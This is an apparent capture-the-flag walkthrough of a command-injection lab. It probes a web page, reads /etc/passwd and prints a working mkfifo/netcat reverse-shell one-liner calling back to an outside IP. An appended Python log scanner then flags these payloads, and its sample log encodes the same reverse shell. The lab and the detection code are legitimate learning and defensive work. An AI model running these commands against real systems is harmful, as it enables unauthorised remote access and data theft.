Injection

An introduction to Command Injection

Blind Command Injection

Let's go to the webpage.

Let's try to find the kernel version, redirect it to a file, and then read the file.

Now let's enter root and look at the response for the answer to the next question.

Now let's enter www-data.

Let's enter our name and see what the output is.

Active Command Injection

Let's go to the webpage that they mention.

Let's list the files with the ls command and see if there is an interesting file.

There is an interesting file.

To see how many users there are on the machine, we can read the /etc/passwd file.

We can look at this output by viewing the page's source code.

We can see which user the app is running as with the whoami command.

We can see what this user's shell is set to in the /etc/passwd file.

We can see what version of Ubuntu is running by using the command lsb_release -a.

We can print out the MOTD with this command.

Get the Flag!

Let's first get a reverse shell on the machine so that we can navigate through it more easily.

First we start a netcat listener.

Now we use the reverse shell command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Let's hit Submit.

We have a shell, so let's stabilize it.

Now let's look for the flag. It might be a txt file, maybe called flag, so let's search for that:

find / -type f -name flag.txt 2>/dev/null

We have the flag, so let's read it.
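From the defender's side, every payload in this walkthrough travels in a request parameter and leaves a trace in the web server's access log. The following is an added example, not part of the original walkthrough: it decodes query parameters from access-log lines and grades them by the commands and shell metacharacters used above. The log lines are constructed, and the paths `/lookup.php` and `/shell.php` and the parameter names `username` and `cmd` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Shell metacharacters that chain, pipe or redirect commands.
META = re.compile(r"[;|&`<>]|\$\(")
# Commands and paths that appear in this walkthrough's payloads.
TOKEN = re.compile(r"\b(?:whoami|uname|lsb_release|mkfifo|nc|cat|ls)\b|/etc/passwd|/bin/sh|/tmp/")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; paths and parameter names are assumptions.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lookup.php?username=alice HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:02:10 +0000] "GET /lookup.php?username=root%3B+uname+-r+%3E+out.txt HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:05:42 +0000] "GET /shell.php?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 200 2210
10.0.0.9 - - [01/Jan/2024:10:09:13 +0000] "GET /shell.php?cmd=rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.0.2.10+1234+%3E%2Ftmp%2Ff HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:11:00 +0000] "GET /lookup.php?username=Tom+%26+Jerry HTTP/1.1" 200 512
"""

def classify(value):
    """Return (severity, matched_tokens) for one decoded parameter value."""
    tokens = sorted(set(TOKEN.findall(value)))
    has_meta = bool(META.search(value))
    if "mkfifo" in tokens and "nc" in tokens:
        return "critical", tokens  # named-pipe reverse shell pattern
    if tokens and has_meta:
        return "high", tokens      # command chained onto the expected input
    if tokens:
        return "medium", tokens    # bare command sent to an endpoint
    return "none", tokens          # a metacharacter alone is not enough

def scan(log_text):
    """Return (client_ip, parameter, severity, tokens) per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl percent-decodes values and turns '+' into spaces.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            severity, tokens = classify(value)
            if severity != "none":
                findings.append((ip, name, severity, tokens))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on decoded values matters here: the raw log lines contain only percent-encoded text, so a pattern search on the undecoded line would miss the chained commands.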
